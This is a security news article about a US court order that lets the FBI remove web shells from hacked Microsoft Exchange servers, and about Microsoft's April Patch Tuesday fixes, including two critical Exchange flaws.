Trouble comes in twos

FBI gets court order to remove backdoors from Microsoft Exchange servers

A US court action has authorized government authorities to remove backdoors from compromised Microsoft Exchange servers.

From the start of the year until at least March 2, when Microsoft issued patches, hacking groups exploited zero-day vulnerabilities in Microsoft Exchange Server software to access email accounts and place web shells in order to maintain persistent access to compromised systems.

In an unusual move, the FBI was granted authority to remove these web shells (which acted like backdoors) from hacked Microsoft Exchange installations.

Removing the web shells entailed the interference of a third-party computer, which might be ruled unlawful without the recent court order.

RECOMMENDED Capcom ransomware attack: Hackers gained access via vulnerable VPN, report finds

This action only deals with part of the problem because compromised systems will still need to be patched, even before further remedial steps can be implemented to detect compromises, restore systems, and expel attackers.

Is therefore best considered as phase one in an ongoing clean-up operation.

“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” a US Department of Justice (DoJ) statement explains.

The statement goes on to discuss the copy (presumably for forensic purposes) and removal of web shells from hundreds of vulnerable computers.

Assistant Attorney General John Demers for the DoJ’s National Security Division, commented: “The court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions.”


News of the court-authorized clean-up operation came on Tuesday (April 13), just hours before Microsoft announced separate patches to address two new Exchange Server vulnerabilities.

Both flaws (tracked as CVE-2021-28480 and CVE-2021-28481) pose a remote code execution risk to unpatched systems.

Worse yet, both security bugs are unauthenticated and require no user interaction, with each qualifying for a critical 9.8 CVSS index score that’s perilously close to the maximum.

Dustin Childs of Trend Micro’s Zero Day Initiative, commented: “Since the attack vector is listed as ‘Network’, it is likely these bugs are wormable – at least between Exchange servers.”

Read more of the latest hacking news from around the world

Childs continued: “The CVSS score for these two bugs is actually higher than the Exchange bugs exploited earlier this year.

“These bugs were credited to the National Security Agency. Considering the source, and considering these bugs also receive Microsoft’s highest Exploit Index rating, assume they will eventually be exploited. Update your systems as soon as possible.”

Patch Tuesday

The Exchange patches were released as part of a bumper Spring edition of Microsoft’s regular monthly Patch Tuesday update cycle.

The April edition of Patch Tuesday included relief for a total of 114 vulnerabilities, 19 of which were critical.

No known exploits are being reported against the latest Exchange flaws, although a client-side Win32k privilege escalation vulnerability (CVE-2021-28310) is said to be under active attack.

The Sans Institute’s Internet Storm Center has published a full rundown of the patches in Microsoft’s April patch batch.

YOU MIGHT ALSO LIKE Pressure grows on Valve to unplug Steam gaming platform vulnerabilities